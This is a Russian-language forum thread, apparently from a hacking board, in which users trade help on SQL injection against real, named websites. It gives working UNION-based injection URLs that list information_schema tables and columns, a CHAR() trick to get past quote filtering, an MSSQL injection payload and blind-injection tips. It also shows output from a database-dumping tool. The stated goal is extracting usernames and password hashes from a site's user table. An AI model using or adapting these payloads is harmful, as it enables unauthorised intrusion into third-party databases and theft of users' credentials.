В общем этим запросом ты пытаешься выдрать данные из таблицы user, которая находится в базе pincode. А чтобы проникнуть в базу нужно указывать в запросе имя базы.название таблицы, выходит pincode.user. Понятнее? =)
и не попашет то что тебе сказали полная ерунда, это означает, что в БД к которой ты имеешь доступ (pincode) нет таблицы users... ищи другую таблицу с акаунтами или если пятая ветка мускула, читай таблицу INFORMATION_SCHEMA
а что интересного в таблице INFORMATION_SCHEMA P.S. а вот мне неп онятно вот ты гвооришь нет таблицы users тада почему я нашел ее там ??? с пмощтю Information_schema.tables нашел таблицу Users .... может быть просто нет доступа ??? к чтению данной таблицы )
Если версия >4.1 кажется, можно попытаться вывести через and-запрос и подзапросы, читай статьи по blind sql inj.
Почитай статьи по blind sql-inj, на сколько я помню, в любой версии можно по буквам подобрать колонки\таблицы и их содержимое. добавлено: Через where+...+like+... можно в любой версии
Хм, у меня такая трабла, при инъекции в mssql при запросе с кавычкой выводится стандартная ошибка Но при запросе, допустим Вылазает ошибка Почему вылазает эта ошибка и как ее обойти ?
Он же те явно пишет типа незакрытая кавычка в запросе: Следовательно инъекцию надо проводить без кавычки, например подставлять -1 и дальше свой запрос, т.е. вызвать не существующее значение... -1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)-- правда иногда работает и так, т.е. используешь значение и кавычку... -1'+or+1.......
подскажите, если не затруднит. Возможно ли при активной КСС перехватить реферера или квери стринг в https, или браузер обязательно их почистит? я бы сам поэксперементировал, но лень
прива я решил сдампить базу испольщовал прогу ачата ))) вот что он мне вывел =====_Databases_Dumper_MSSQL(MySQL-5.*)_===== Mon Sep 17 21:36:34 2007 *URL:____________http://www.site.ru/?pageId=1&subId=1 UNION-Subquery:_UNION Algoritm:_______only Tables Evristic:_______ON Brut:___________OFF NOT:____________NOT IN HEX:____________OFF Space:__________%20 POST-GET:_______GET Time:___________0 User-Agent:_____useragent.txt Proxy:__________proxy.txt Log:____________log_basedump.txt =====_Databases_Dumper_MSSQL(MySQL-5.*)_===== GO! Start evristic detection. Please, WAIT... Detect MySQL OK! Find 1 column. Use mysql concat-tehnology: First Answer: blahhh Second Answer: hhhalb Sorry, Work Column not detect =( EXIT запрос был таким C:\public>perl.exe mssql_base_dump_111.pl -u "http://site.ru/?pageId=1&s ubId=1'" -M MySQL -t Cart очень прошу помоч...
Calcutta, что бы твой запрос выполнился нужно чтобы в предыдущем была ошибка. Вот так, например Code: http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,table_name,column_name),4,5,6,7,8+from+information_schema.columns и переберай таблички )
Народ, сорри что снова задаю тотже вопрос что и парой страниц ранее, безусловно помощь мне оказали, но доконца осуществить задуманное мне так и не удалось... Вкраце повторюсь и опишу проблему.. при помощи такого запроса удалось выдрать таблички _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,table_name,5+from+information_schema.tables+limit+73,1/ их 73 штуки.. из них лиш одна пахожа на ту, где хранятся логины и хэши она называется g2_User и идёт 71 по счету... Кавычки фильтруются, но при помощи CHAR удалось вытащить из этой таблички названия полей таким вот образом: _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,column_name,5+from+information_schema.columns+where+table_name=CHAR(103,50,95,85,115,101,114)+limit+6,1/* поля g_id g_userName g_fullName g_hashedPassword g_email g_language g_locked Но далее при попытке вывести данные таким образом: _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+g2_User/* вылетает сообщение о неверном запросе... Ктонибудь, подскажите плиз в чём проблема, и как её решить?)